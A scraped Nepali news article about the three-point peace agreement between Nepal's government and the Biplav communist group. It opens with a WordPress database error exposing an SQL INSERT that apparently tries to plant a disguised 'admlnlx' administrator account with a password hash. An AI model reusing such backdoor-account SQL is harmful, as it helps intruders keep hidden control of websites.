WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BZ9kBtH9kTn.32I7RR8Z6LsdsC5Qti0', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-31 11:20:32', '', 'admlnlx', 'admlnlx')
काठमाडौं । तीनबुँदे सहमतिपत्रमा सरकार र विप्लव समुहबीच राष्टिय सभहलामा आयोजिता कार्यक्रममा हस्ताक्ष्ँर भएको छ ।
प्रधानमन्त्री केपी शर्मा ओली र नेकपा विप्लव समूहका महासचिव नेत्रविक्रम चन्द विप्लवको उपस्थितिमा दुबै पक्षको वार्ता टोलीका संयोजकहरु रामबहादुर थापा बादल र खड्गबहादुर विश्वकर्माले सहमतिपत्रमा हस्ताक्षर गरेका हुन् ।
तीन बुँदे सहमतिपत्र अनुसार १ नम्बर बुँदामा लेखिएको छ, ‘दुबै पक्ष नेपाल सरकार नेपाल कम्युनिस्ट पार्टी देशको राजनीतिक समस्याहरु वार्ता र सम्वादबाट समाधान गर्न सहमत भएका छौं ।’
दुई नम्बर बुँदामा लेखिएको छ, ‘नेपाल कम्युनिस्ट पार्टी आफ्ना सबै राजनीतिक क्रियाकलाप शान्तिपूर्ण रुपमा गर्न सहमत भएको छ । र तेस्रो ‘नेपाल सरकार नेपाल कम्युनिस्ट पार्टीमाथि लगाएको प्रतिबन्ध हटाउन, कारागारमा रहेका पार्टीका नेता र कार्यकर्ता रिहाई गर्र्न र सम्पूर्ण मुद्दाहरु खारेज गर्न सहमत भएको छ ।’